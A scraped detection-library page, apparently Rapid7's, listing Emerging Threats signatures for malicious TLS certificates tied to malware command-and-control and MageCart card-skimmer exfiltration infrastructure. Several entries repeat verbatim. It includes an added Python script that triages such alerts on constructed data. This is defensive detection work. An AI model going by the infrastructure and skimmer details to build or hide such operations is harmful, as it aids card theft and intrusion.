This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup Stage 2 CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ElegyRAT)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ELF/Rekoobe CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fake Gmail Self Signed - Possible Cobalt Stirke)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (FIN7/GRIFFON CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (FIN7/JSSLoader CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (FIN8 CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL Cert (FIN8 ShellTea CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (FIN8 Staging CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Gelsemium CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with Gelsemium command-and-control infrastructure. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Get2 CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with Get2 command-and-control infrastructure. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Gozi CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with Gozi command-and-control infrastructure. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Gozi ISFB)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with Gozi ISFB infrastructure. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (GRIFFON CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with GRIFFON command-and-control infrastructure. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (IcedID CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with IcedID command-and-control infrastructure. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (JS/Ostap CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with JS/Ostap command-and-control infrastructure. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (jssLoader CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with jssLoader command-and-control infrastructure. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (JS WebSkimmer Exfil Site)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with a JavaScript web-skimmer exfiltration site. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. For web-skimmer signatures such as this one, the internal host is usually a browser that loaded a compromised checkout page rather than a host running malware, so also treat any payment-card details entered during that session as potentially exposed. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Klingon RAT)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with Klingon RAT infrastructure. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL Cert (Lazarus APT MalDoc 2020-11-30)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with Lazarus APT malicious-document infrastructure (indicator dated 2020-11-30). Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Lazarus APT MalDoc DL 2020-05-05)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with Lazarus APT malicious-document download infrastructure (indicator dated 2020-05-05). Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (LazarusGroup CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with Lazarus Group command-and-control infrastructure. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with MageCart web-skimming infrastructure. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. For web-skimmer signatures such as this one, the internal host is usually a browser that loaded a compromised checkout page rather than a host running malware, so also treat any payment-card details entered during that session as potentially exposed. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with MageCart command-and-control infrastructure. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. For web-skimmer signatures such as this one, the internal host is usually a browser that loaded a compromised checkout page rather than a host running malware, so also treat any payment-card details entered during that session as potentially exposed. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Exfil)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with a MageCart exfiltration endpoint. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. For web-skimmer signatures such as this one, the internal host is usually a browser that loaded a compromised checkout page rather than a host running malware, so also treat any payment-card details entered during that session as potentially exposed. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Exfil Domain)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with a MageCart exfiltration domain. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. For web-skimmer signatures such as this one, the internal host is usually a browser that loaded a compromised checkout page rather than a host running malware, so also treat any payment-card details entered during that session as potentially exposed. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 11 CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with MageCart Group 11 command-and-control infrastructure. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. For web-skimmer signatures such as this one, the internal host is usually a browser that loaded a compromised checkout page rather than a host running malware, so also treat any payment-card details entered during that session as potentially exposed. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 12)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with MageCart Group 12 infrastructure. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. For web-skimmer signatures such as this one, the internal host is usually a browser that loaded a compromised checkout page rather than a host running malware, so also treat any payment-card details entered during that session as potentially exposed. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 1/2 CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with MageCart Group 1/2 command-and-control infrastructure. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. For web-skimmer signatures such as this one, the internal host is usually a browser that loaded a compromised checkout page rather than a host running malware, so also treat any payment-card details entered during that session as potentially exposed. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 1/2 Staging Domain)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with a MageCart Group 1/2 staging domain. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. For web-skimmer signatures such as this one, the internal host is usually a browser that loaded a compromised checkout page rather than a host running malware, so also treat any payment-card details entered during that session as potentially exposed. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 3 Staging Domain)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with a MageCart Group 3 staging domain. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. For web-skimmer signatures such as this one, the internal host is usually a browser that loaded a compromised checkout page rather than a host running malware, so also treat any payment-card details entered during that session as potentially exposed. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. The underlying Emerging Threats signature matches a TLS/SSL server certificate that has been associated with MageCart Group 4 command-and-control infrastructure. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. Certificate-based signatures match the certificate the server presents, so confirm which side of the session is the internal host rather than assuming the alert's source address is the client, and rule out a known-good service that happens to present the same certificate before acting. For web-skimmer signatures such as this one, the internal host is usually a browser that loaded a compromised checkout page rather than a host running malware, so also treat any payment-card details entered during that session as potentially exposed. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587
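Every "ET MALWARE Observed Malicious SSL Cert (...)" entry above carries the same triage advice: find the internal host on whichever side of the session it sits, look at the certificate fields the signature matched on, and prioritise hosts that trip several families. The Python below is an added example of that triage and is not Rapid7 or Emerging Threats code. It assumes the alerts can be exported as Suricata EVE JSON (the ET ruleset is written for Suricata; the Insight Network Sensor's own export format is not shown on this page), and every record, host address, signature ID (9000001 to 9000004) and certificate fingerprint in it is a constructed placeholder rather than a real indicator. It also shows the colon-separated SHA-1 form that Suricata's tls.fingerprint keyword uses, which is what a certificate indicator has to look like to be compared against these alerts.

```python
"""Triage of 'ET MALWARE Observed Malicious SSL Cert (...)' alerts from EVE JSON.

Added example; assumes Suricata EVE JSON export. All sample data is constructed.
"""
import hashlib
import ipaddress
import json
import re
from collections import defaultdict

INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
FAMILY_RE = re.compile(r"Observed Malicious SSL Cert \((.+)\)\s*$")
PLACEHOLDER_FP = "11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:00:11:22:33:44"  # not a real cert hash


def _alert(ts, src, sport, dst, dport, sig, sid, tls=None):
    """Build one constructed EVE alert record (placeholder signature IDs, not ET SIDs)."""
    rec = {"timestamp": ts, "event_type": "alert", "src_ip": src, "src_port": sport,
           "dest_ip": dst, "dest_port": dport, "proto": "TCP",
           "alert": {"signature_id": sid, "rev": 1, "signature": sig, "severity": 1}}
    if tls:
        rec["tls"] = tls
    return json.dumps(rec)


# Constructed sample records. Certificate rules match the certificate the *server*
# sends, so here the external server is src_ip and the internal client is dest_ip.
SAMPLE_EVE_LINES = [
    _alert("2024-03-01T10:15:02.000000+0000", "203.0.113.10", 443, "10.20.30.40", 51234,
           "ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)", 9000001,
           {"subject": "CN=static-assets.example", "sni": "static-assets.example",
            "version": "TLS 1.2", "fingerprint": PLACEHOLDER_FP}),
    _alert("2024-03-01T10:16:40.000000+0000", "198.51.100.7", 443, "10.20.30.40", 51900,
           "ET MALWARE Observed Malicious SSL Cert (Gozi ISFB)", 9000002,
           {"subject": "CN=placeholder.example", "version": "TLS 1.2",
            "fingerprint": "aa:bb:cc:dd:ee:ff:00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd"}),
    _alert("2024-03-01T10:20:11.000000+0000", "198.51.100.9", 8443, "10.20.30.41", 49310,
           "ET MALWARE Observed Malicious SSL Cert (IcedID CnC)", 9000003,
           {"subject": "CN=placeholder.example", "version": "TLS 1.2",
            "fingerprint": "00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:00:11:22:33"}),
    # Not a certificate signature: must be ignored by the triage.
    _alert("2024-03-01T10:21:00.000000+0000", "10.20.30.42", 50001, "203.0.113.50", 80,
           "ET INFO GET Minimal HTTP Headers Flowbit Set", 9000004),
    # A plain TLS log record rather than an alert: must also be ignored.
    json.dumps({"timestamp": "2024-03-01T10:22:00.000000+0000", "event_type": "tls",
                "src_ip": "10.20.30.43", "src_port": 50002, "dest_ip": "203.0.113.60",
                "dest_port": 443, "tls": {"sni": "www.example", "version": "TLS 1.3"}}),
]


def family_from_signature(signature):
    """Return the parenthesised family name, or None for non-cert signatures."""
    m = FAMILY_RE.search(signature)
    return m.group(1) if m else None


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def triage_alert(record):
    """Normalise one EVE alert: which side is ours, who the peer is, what cert matched."""
    if record.get("event_type") != "alert":
        return None
    family = family_from_signature(record["alert"]["signature"])
    if family is None:
        return None
    src, dst = record["src_ip"], record["dest_ip"]
    if is_internal(dst) and not is_internal(src):      # usual case: server -> our client
        internal, external, ext_port, direction = dst, src, record["src_port"], "server_to_client"
    elif is_internal(src) and not is_internal(dst):
        internal, external, ext_port, direction = src, dst, record["dest_port"], "client_to_server"
    else:                                               # both sides internal or both external
        internal, external, ext_port, direction = dst, src, record["src_port"], "ambiguous"
    tls = record.get("tls", {})
    return {"timestamp": record["timestamp"], "sid": record["alert"]["signature_id"],
            "family": family, "internal_host": internal, "direction": direction,
            "external_peer": f"{external}:{ext_port}", "sni": tls.get("sni"),
            "cert_subject": tls.get("subject"), "cert_fingerprint": tls.get("fingerprint")}


def triage(lines):
    """Parse EVE JSON lines and keep only the certificate alerts, normalised."""
    out = []
    for line in lines:
        if line.strip():
            t = triage_alert(json.loads(line))
            if t:
                out.append(t)
    return out


def hosts_by_priority(triaged):
    """Internal hosts with the set of families seen, most families first."""
    per_host = defaultdict(set)
    for t in triaged:
        per_host[t["internal_host"]].add(t["family"])
    return sorted(per_host.items(), key=lambda kv: (-len(kv[1]), kv[0]))


def suricata_tls_fingerprint(der_cert):
    """SHA-1 of a DER certificate in the colon-separated form tls.fingerprint uses."""
    digest = hashlib.sha1(der_cert).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def matches_indicator(triaged_alert, indicator_fingerprints):
    """Case-insensitive check of the logged certificate fingerprint against a list."""
    fp = (triaged_alert["cert_fingerprint"] or "").lower()
    return fp in {f.lower() for f in indicator_fingerprints}


if __name__ == "__main__":
    results = triage(SAMPLE_EVE_LINES)
    for host, families in hosts_by_priority(results):
        print(host, sorted(families))
    for t in results:
        print(t["internal_host"], "<-", t["external_peer"], t["family"], t["cert_fingerprint"])
```

Running the block on the constructed data lists 10.20.30.40 first (two families, MageCart Group 4 CnC and Gozi ISFB) and 10.20.30.41 second, and ignores the ET INFO alert and the bare TLS record. Direction handling is the point worth keeping: for these rules the alert's src_ip is normally the server presenting the certificate, so a triage that blindly treats src_ip as "the infected host" would report the attacker's server instead of the internal client.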

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 Staging Domain)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 5 Staging Domain)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Magecart/Skimmer CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Staging Domain)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc 2020-03-09)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL 2019-09-17 1)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL) 2019-10-24

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL 2019-11-15)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL 2020-02-21)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL 2020-02-21 2)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL 2020-02-21 3)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL 2020-05-27)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

